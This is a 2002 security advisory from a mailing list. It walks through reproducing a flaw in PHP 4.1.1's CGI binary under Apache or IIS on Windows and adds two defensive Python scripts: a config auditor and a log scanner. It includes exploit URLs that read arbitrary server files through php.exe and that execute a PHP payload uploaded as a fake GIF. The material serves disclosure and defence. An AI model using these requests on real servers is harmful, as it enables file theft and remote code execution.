[NT] Compromising IIS or Apache Servers Running PHP for Windows (Step-by-Step)

From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 26 Feb 2002 17:26:38 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Compromising IIS or Apache Servers Running PHP for Windows (Step-by-Step)
------------------------------------------------------------------------

SUMMARY

As we described in our earlier advisories,
<http://www.securiteam.com/windowsntfocus/5YP0L0U60C.html> Gaining Root
Access via PHP.exe and
<http://www.securiteam.com/windowsntfocus/5ZP030U60U.html> Security Risk
When Using the CGI Binary (PHP.EXE) Under Apache, a Windows host running
nothing more than PHP's CGI binary (php.exe) under Apache or IIS can be
compromised. The following is a systematic recreation of the
vulnerability.

DETAILS

Vulnerable systems:
PHP version 4.1.1 under Apache 2.0.32 (Feb 16 2002 12:35:44)
PHP version 4.1.1 under IIS

Recreating the vulnerability:
1) Download apache for Windows. See:
http://httpd.apache.org/docs/windows.html
http://www.apache.org/dist/httpd/binaries/win32/
http://www.apache.org/dist/httpd/binaries/win32/apache_2.0.32-beta-win32-x86-no_ssl.msi

2) Install. We used the following installation procedure:
- Next->Accept Agreement->Next->Next->
somehat.com->Tab->www.somehat.com->Tab->webmaster@somehat.com->For all
users->Next
- Typical->Next
- C:\Program Files\Apache Group\->Next
- Finish.

3) Make sure Apache is listening on port 80:
C:\> netstat -an | find "80"
  TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
(find matches any line containing "80", including other ports, so look
specifically for the 0.0.0.0:80 LISTENING entry.)

4) And via Internet Explorer, go to: http://localhost
The default Apache page should read:
"If you can see this, the installation of the Apache web server software
on this system was successful. You may now add content to this directory
and replace this page."

5) Download PHP for Windows. See:
http://www.php.net/
http://www.php.net/downloads.php
http://www.php.net/do_download.php?download_file=php-4.1.1-installer.exe

6) We used the following installation procedure:
- Next->I Agree->Standard->Next
- c:\PHP->Next->Localhost->Tab->me@localhost.com->Next
- Apache->Next
- Ok->Ok

7) Modify the httpd.conf file (the procedure is taken from:
http://www.php.net/manual/en/install.windows.php
http://www.php.net/manual/en/install.apache.php)

- Open httpd.conf in Notepad

- After:
ScriptAlias /cgi-bin/ "C:/Program Files/Apache Group/Apache2/cgi-bin/"
Add:
ScriptAlias /php/ "c:/php/"

- After:
AddType application/x-tar .tgz
Add:
AddType application/x-httpd-php .php .phtml

- After:
# Format: Action handler-name /cgi-script/location
Add:
Action application/x-httpd-php "/php/php.exe"

8) Restart apache.

9) Check that everything is working:
Going to:
http://localhost/php/php.exe

Should return:
No input file specified.

(That message comes from php.exe itself: it ran as a CGI program without
being given a script path. Because ScriptAlias /php/ maps the whole c:\php
directory as CGI, the interpreter binary is directly reachable by URL.)

10) Create a file in c:\ called hello.txt containing the text "Hello
world.", and see if you can view that file through php.exe.
For example:
http://localhost/php/php.exe?c:\hello.txt

Should return the text inside that file:
Hello world.

This is the <http://www.securiteam.com/windowsntfocus/5ZP030U60U.html>
Security Risk When Using the CGI Binary (PHP.EXE) Under Apache attack: the
query string is handed to php.exe as the path of the script to run, so any
readable file on the server can be requested (plain text is returned
verbatim, PHP code is executed).

It also means that
<http://www.securiteam.com/windowsntfocus/5YP0L0U60C.html> Gaining Root
Access via PHP.exe works against this setup as well.

This would allow an attacker to gain complete control over the remote
server.
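As an added check (editor's example, not part of this advisory and not code from PHP or Apache), the following Python script parses the directives added in step 7 out of an httpd.conf and reports how the PHP CGI binary becomes reachable by URL: a ScriptAlias that serves the whole PHP install directory as CGI, and an Action handler whose URL sits under that alias. The sample configuration strings and the directory listing are constructed from the steps above. The module-based alternative shown for comparison (LoadModule with php4apache2.dll) is the editor's suggestion; its file name and path are assumed, so check the sapi directory of your PHP distribution before relying on it.

```python
import re

# Constructed sample: the directives the advisory adds to httpd.conf (step 7),
# next to the stock cgi-bin ScriptAlias they are inserted after.
VULNERABLE_CONF = r'''
ScriptAlias /cgi-bin/ "C:/Program Files/Apache Group/Apache2/cgi-bin/"
ScriptAlias /php/ "c:/php/"
AddType application/x-tar .tgz
AddType application/x-httpd-php .php .phtml
# Format: Action handler-name /cgi-script/location
Action application/x-httpd-php "/php/php.exe"
'''

# Constructed alternative: PHP loaded as an Apache module, so no CGI binary is
# mapped to a URL. Module file name and path are ASSUMED (editor's example);
# check the sapi directory of your PHP distribution.
MODULE_CONF = r'''
LoadModule php4_module "c:/php/sapi/php4apache2.dll"
AddType application/x-httpd-php .php .phtml
'''

# Constructed directory listing standing in for what a ScriptAlias target holds.
LISTING = {"c:/php": ["php.exe", "php4ts.dll", "php.ini"]}

# Interpreters that must never be reachable as a CGI script by URL.
INTERPRETERS = {"php.exe", "php-cgi.exe", "perl.exe", "cmd.exe"}

TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


def parse_directives(conf):
    """Return [(name, [args])] for each non-blank, non-comment line, honouring quotes."""
    directives = []
    for line in conf.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = [quoted or bare for quoted, bare in TOKEN_RE.findall(line)]
        directives.append((parts[0], parts[1:]))
    return directives


def script_aliases(directives):
    """Map URL prefix -> filesystem directory for every ScriptAlias directive."""
    return {args[0]: args[1] for name, args in directives
            if name.lower() == "scriptalias" and len(args) == 2}


def audit_php_cgi_exposure(conf, listing):
    """Describe every way the configuration makes a CGI interpreter callable by URL."""
    directives = parse_directives(conf)
    aliases = script_aliases(directives)
    findings = []
    # Rule 1: a ScriptAlias target directory that contains an interpreter binary
    # turns that binary into a CGI script anyone can request.
    for prefix, directory in aliases.items():
        for name in listing.get(directory.lower().rstrip("/"), []):
            if name.lower() in INTERPRETERS:
                findings.append(f"ScriptAlias {prefix} serves {directory}{name} "
                                f"as CGI; it is reachable as {prefix}{name}")
    # Rule 2: an Action handler whose URL lies under a ScriptAlias is not only
    # an internal handler but also a public CGI endpoint.
    for name, args in directives:
        if name.lower() == "action" and len(args) == 2:
            mime, handler = args
            for prefix in aliases:
                if handler.startswith(prefix):
                    findings.append(f"Action for {mime} runs {handler}, which is "
                                    f"under ScriptAlias {prefix} and so can be "
                                    f"called directly with any path as query string")
    return findings


if __name__ == "__main__":
    for label, conf in (("CGI setup", VULNERABLE_CONF), ("module setup", MODULE_CONF)):
        print(label, audit_php_cgi_exposure(conf, LISTING) or ["no CGI interpreter exposed"])
```

Run against the CGI configuration the script reports both the exposed php.exe and the Action handler living under /php/; against the module configuration it reports nothing, because no directory is mapped as CGI at all. The listing is passed in explicitly so the audit can run offline; on a real host build it from os.listdir of each ScriptAlias target.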

If this is not enough, suppose the site runs a PHP script that stores
uploaded files in a directory UNDER HTDOCS of Apache.
In our example:
C:\Program Files\Apache Group\Apache2\htdocs\images

The attacker will upload an innocent looking file called:
smily.gif

Where the smily.gif file contains:
<? phpinfo(); ?>

Accessing:
http://localhost/php/php.exe?C:\Program%20Files\Apache%20Group\Apache2\htdocs\images\smily.gif

Returns:
PHP Version 4.1.1

This lets an attacker upload a script under whatever file name the upload
facility accepts and execute it remotely through php.exe.
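The requests in steps 9 and 10 and the smily.gif request above leave a distinctive trace in Apache's access log. As an added example (editor's code, not from the advisory), this Python script scans common-log-format lines for direct calls to php.exe and flags query strings that carry an absolute Windows path, a traversal sequence, or a non-PHP file name such as smily.gif. The log lines are constructed to mirror the requests in this advisory; they are not captured traffic.

```python
import re
from urllib.parse import unquote

# Constructed common-log-format lines modelled on the requests in this
# advisory; they are not captured traffic.
SAMPLE_LOG = r'''
10.0.0.5 - - [26/Feb/2002:17:20:01 +0100] "GET /php/php.exe HTTP/1.0" 200 27
10.0.0.5 - - [26/Feb/2002:17:20:09 +0100] "GET /php/php.exe?c:\hello.txt HTTP/1.0" 200 13
10.0.0.5 - - [26/Feb/2002:17:21:44 +0100] "GET /php/php.exe?C:\Program%20Files\Apache%20Group\Apache2\htdocs\images\smily.gif HTTP/1.0" 200 4812
10.0.0.9 - - [26/Feb/2002:17:22:10 +0100] "GET /index.php?page=home HTTP/1.0" 200 1024
10.0.0.9 - - [26/Feb/2002:17:22:15 +0100] "GET /images/smily.gif HTTP/1.0" 200 25
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')
WIN_ABS_PATH = re.compile(r'^[A-Za-z]:[\\/]')      # c:\..., C:/...
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')  # ..\ or ../ path segments
PHP_EXTS = (".php", ".phtml")                      # the only things Action should hand php.exe


def classify_request(target):
    """Return the reasons a request target looks like abuse of the PHP CGI binary."""
    path, _, query = target.partition("?")
    if not path.lower().endswith("/php.exe"):
        return []
    reasons = ["direct request to the PHP CGI binary"]
    if not query:
        return reasons
    script = unquote(query)  # php.exe treats the query string as the script path
    if WIN_ABS_PATH.match(script):
        reasons.append("absolute Windows path passed as script: " + script)
    if TRAVERSAL.search(script):
        reasons.append("directory traversal in script path: " + script)
    if not script.lower().endswith(PHP_EXTS):
        reasons.append("non-PHP file executed through php.exe: " + script)
    return reasons


def scan_log(text):
    """Parse common-log-format lines and return one finding per suspicious request."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m["target"])
        if reasons:
            findings.append({"ip": m["ip"], "time": m["ts"], "target": m["target"],
                             "status": int(m["status"]), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["status"], f["target"])
        for r in f["reasons"]:
            print("   -", r)
```

Any request whose path is php.exe is reported, because under the Action directive the browser should never address the CGI binary itself; the query-string checks then separate reconnaissance (no script path) from file reads and from execution of uploaded non-PHP files. The same logic applies to IIS logs once the request target is extracted from the W3C format.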

ADDITIONAL INFORMATION

The article has been assembled with the help of
<mailto:brereton_paul@btopenworld.com> Paul Brereton,
<mailto:dan.kuykendall@foundstone.com> Dan Kuykendall and the
<mailto:experts@securiteam.com> SecurITeam Experts.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
